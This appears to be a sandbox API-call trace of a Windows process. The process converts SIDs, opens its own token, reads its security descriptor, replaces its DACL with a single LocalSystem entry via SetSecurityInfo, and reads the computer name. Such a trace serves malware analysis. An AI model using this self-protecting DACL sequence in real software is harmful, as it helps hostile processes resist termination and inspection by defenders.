[0189.933] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f6fc, pSourceSid=0x306f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x2a6f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0189.933] IsValidSid (pSid=0x2a6f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0189.933] ConvertSidToStringSidA () returned 0x1
[0189.933] LocalFree (hMem=0x2fc1c8) returned 0x0
[0189.933] LocalFree (hMem=0x306f58) returned 0x0
[0189.933] ConvertStringSidToSidA () returned 0x1
[0189.933] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f770, pSourceSid=0x306f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x2a6f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0189.933] IsValidSid (pSid=0x2a6f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0189.933] ConvertSidToStringSidA () returned 0x1
[0189.933] LocalFree (hMem=0x2fc1c8) returned 0x0
[0189.933] LocalFree (hMem=0x306f70) returned 0x0
[0189.933] ConvertStringSidToSidA () returned 0x1
[0189.933] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f7f8, pSourceSid=0x306f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x2a6f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0189.933] IsValidSid (pSid=0x2a6f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0189.933] ConvertSidToStringSidA () returned 0x1
[0189.933] LocalFree (hMem=0x2fc1c8) returned 0x0
[0189.933] LocalFree (hMem=0x306f40) returned 0x0
[0189.933] ConvertStringSidToSidA () returned 0x1
[0189.933] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f880, pSourceSid=0x306f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x2a6f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0189.933] IsValidSid (pSid=0x2a6f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0189.933] ConvertSidToStringSidA () returned 0x1
[0189.933] LocalFree (hMem=0x306f58) returned 0x0
[0189.933] LocalFree (hMem=0x306f40) returned 0x0
[0189.933] ConvertStringSidToSidA () returned 0x1
[0189.933] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f90c, pSourceSid=0x306f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x2a6f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0189.933] IsValidSid (pSid=0x2a6f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0189.933] ConvertSidToStringSidA () returned 0x1
[0189.933] LocalFree (hMem=0x306f58) returned 0x0
[0189.933] LocalFree (hMem=0x306f40) returned 0x0
[0189.933] ConvertStringSidToSidA () returned 0x1
[0189.933] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f998, pSourceSid=0x306f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x2a6f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0189.933] IsValidSid (pSid=0x2a6f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0189.933] ConvertSidToStringSidA () returned 0x1
[0189.933] LocalFree (hMem=0x306f58) returned 0x0
[0189.934] LocalFree (hMem=0x306f40) returned 0x0
[0189.934] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0189.934] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0189.934] GetCurrentThread () returned 0xfffffffe
[0189.934] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.934] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0189.934] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x12e96c | out: TokenHandle=0x12e96c*=0x2943756) returned 0
[0189.934] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0189.934] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0189.934] GetCurrentProcess () returned 0xffffffff
[0189.934] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.934] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0189.934] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x2a6fa3c | out: TokenHandle=0x2a6fa3c*=0x1d0) returned 1
[0189.935] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.935] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0189.935] MapGenericMask (in: AccessMask=0x12e7e4, GenericMapping=0x12e7e8 | out: AccessMask=0x12e7e4)
[0189.935] MapGenericMask (in: AccessMask=0x12e918, GenericMapping=0x12e91c | out: AccessMask=0x12e918)
[0189.935] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.935] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0189.935] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12e92c | out: TokenInformation=0x0, ReturnLength=0x12e92c) returned 0
[0189.935] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0189.935] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0189.935] GetLastError () returned 0x7a
[0189.935] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0189.936] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0189.936] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x300780, TokenInformationLength=0x24, ReturnLength=0x12e950 | out: TokenInformation=0x300780, ReturnLength=0x12e950) returned 1
[0189.936] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fab0, pSourceSid=0x300788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a6fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0189.936] IsValidSid (pSid=0x2a6fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0189.936] ConvertSidToStringSidA () returned 0x1
[0189.936] LocalFree (hMem=0x2f9e80) returned 0x0
[0189.936] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0189.936] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0189.936] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fb34, pSourceSid=0x2a6fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a6fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0189.936] IsValidSid (pSid=0x2a6fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0189.936] ConvertSidToStringSidA () returned 0x1
[0189.936] LocalFree (hMem=0x2f9e80) returned 0x0
[0189.936] IsValidSid (pSid=0x2a6fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0189.936] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0189.936] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0189.937] CloseHandle (hObject=0x1d0) returned 1
[0189.937] ConvertStringSidToSidA () returned 0x1
[0189.937] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fa54, pSourceSid=0x306f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x2a6fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0189.937] IsValidSid (pSid=0x2a6fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0189.937] ConvertSidToStringSidA () returned 0x1
[0189.937] LocalFree (hMem=0x306f58) returned 0x0
[0189.937] LocalFree (hMem=0x306f40) returned 0x0
[0189.937] ConvertStringSidToSidA () returned 0x1
[0189.937] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fae0, pSourceSid=0x306f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x2a6fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0189.937] IsValidSid (pSid=0x2a6fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0189.937] ConvertSidToStringSidA () returned 0x1
[0189.937] LocalFree (hMem=0x306f58) returned 0x0
[0189.937] LocalFree (hMem=0x306f40) returned 0x0
[0189.937] ConvertStringSidToSidA () returned 0x1
[0189.937] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fbfc, pSourceSid=0x306f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x2a6fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0189.937] IsValidSid (pSid=0x2a6fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0189.937] ConvertSidToStringSidA () returned 0x1
[0189.937] LocalFree (hMem=0x306f58) returned 0x0
[0189.937] LocalFree (hMem=0x306f40) returned 0x0
[0189.937] ConvertStringSidToSidA () returned 0x1
[0189.937] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fc8c, pSourceSid=0x306f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x2a6fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0189.937] IsValidSid (pSid=0x2a6fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0189.937] ConvertSidToStringSidA () returned 0x1
[0189.937] LocalFree (hMem=0x306f58) returned 0x0
[0189.937] LocalFree (hMem=0x306f40) returned 0x0
[0189.937] ConvertStringSidToSidA () returned 0x1
[0189.937] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fd1c, pSourceSid=0x306f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x2a6fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0189.937] IsValidSid (pSid=0x2a6fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0189.937] ConvertSidToStringSidA () returned 0x1
[0189.937] LocalFree (hMem=0x306f58) returned 0x0
[0189.937] LocalFree (hMem=0x306f40) returned 0x0
[0189.937] GetCurrentProcessId () returned 0x2a8
[0189.937] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0x2a8) returned 0x1d0
[0189.938] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.938] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0189.938] GetSecurityInfo () returned 0x0
[0189.947] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.948] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0189.948] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x300f28, pControl=0x12e6f2, lpdwRevision=0x12e6ec | out: pControl=0x12e6f2, lpdwRevision=0x12e6ec) returned 1
[0189.948] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.948] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0189.948] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x300f28, pOwner=0x12e6e8, lpbOwnerDefaulted=0x12e6dc | out: pOwner=0x12e6e8*=0x0, lpbOwnerDefaulted=0x12e6dc) returned 1
[0189.948] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.948] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0189.948] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x300f28, pGroup=0x12e6e8, lpbGroupDefaulted=0x12e6dc | out: pGroup=0x12e6e8*=0x0, lpbGroupDefaulted=0x12e6dc) returned 1
[0189.948] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.948] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0189.948] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x300f28, lpbDaclPresent=0x12e6e0, pDacl=0x12e6d4, lpbDaclDefaulted=0x12e6dc | out: lpbDaclPresent=0x12e6e0, pDacl=0x12e6d4, lpbDaclDefaulted=0x12e6dc) returned 1
[0189.948] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.949] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0189.949] IsValidAcl (pAcl=0x300f3c) returned 1
[0189.949] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.949] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0189.949] GetAce (in: pAcl=0x300f3c, dwAceIndex=0x0, pAce=0x12e574 | out: pAce=0x12e574*=0x300f44) returned 1
[0189.949] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fe74, pSourceSid=0x300f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a6fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0189.949] IsValidSid (pSid=0x2a6fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0189.949] ConvertSidToStringSidA () returned 0x1
[0189.949] LocalFree (hMem=0x307018) returned 0x0
[0189.949] GetAce (in: pAcl=0x300f3c, dwAceIndex=0x1, pAce=0x12e574 | out: pAce=0x12e574*=0x300f5c) returned 1
[0189.949] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6ff60, pSourceSid=0x300f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a6ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0189.949] IsValidSid (pSid=0x2a6ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0189.949] ConvertSidToStringSidA () returned 0x1
[0189.949] LocalFree (hMem=0x307018) returned 0x0
[0189.949] GetAce (in: pAcl=0x300f3c, dwAceIndex=0x2, pAce=0x12e574 | out: pAce=0x12e574*=0x300f70) returned 1
[0189.949] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a629c0, pSourceSid=0x300f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x2a629c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0189.949] IsValidSid (pSid=0x2a629c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0189.949] ConvertSidToStringSidA () returned 0x1
[0189.949] LocalFree (hMem=0x307018) returned 0x0
[0189.949] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.949] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0189.949] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x300f28, lpbSaclPresent=0x12e6e4, pSacl=0x12e6d8, lpbSaclDefaulted=0x12e6dc | out: lpbSaclPresent=0x12e6e4, pSacl=0x12e6d8, lpbSaclDefaulted=0x12e6dc) returned 1
[0189.949] LocalFree (hMem=0x300f28) returned 0x0
[0189.950] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0189.950] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.950] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0189.950] GetLengthSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0189.950] GetLastError () returned 0x0
[0189.950] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0189.950] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0189.950] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.950] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0189.950] InitializeAcl (in: pAcl=0x307fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x307fa8) returned 1
[0189.950] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0189.950] GetLengthSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0189.950] GetLastError () returned 0x0
[0189.950] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0189.950] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0189.951] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0189.951] SetLastError (dwErrCode=0x0)
[0189.951] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.951] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0189.951] GetSidSubAuthorityCount (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a6f615
[0189.951] GetLastError () returned 0x0
[0189.951] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0189.951] SetLastError (dwErrCode=0x0)
[0189.951] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.951] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0189.951] GetSidIdentifierAuthority (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a6f616
[0189.951] GetLastError () returned 0x0
[0189.951] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0189.951] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0189.951] SetLastError (dwErrCode=0x0)
[0189.951] GetSidSubAuthorityCount (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a6f615
[0189.951] GetLastError () returned 0x0
[0189.951] SetLastError (dwErrCode=0x0)
[0189.951] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.951] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0189.951] GetSidSubAuthority (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x2a6f61c
[0189.952] GetLastError () returned 0x0
[0189.952] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0189.952] GetLengthSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0189.952] GetLastError () returned 0x0
[0189.952] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.952] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0189.952] AddAce (in: pAcl=0x307fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x2f2f90, nAceListLength=0x14 | out: pAcl=0x307fa8) returned 1
[0189.952] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0189.952] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0189.952] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0189.952] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0189.952] SetSecurityInfo () returned 0x0
[0189.952] CloseHandle (hObject=0x1d0) returned 1
[0189.952] GetComputerNameA (in: lpBuffer=0x2a6fd84, nSize=0x12e9ac | out: lpBuffer="CRH2YWU7", nSize=0x12e9ac) returned 1
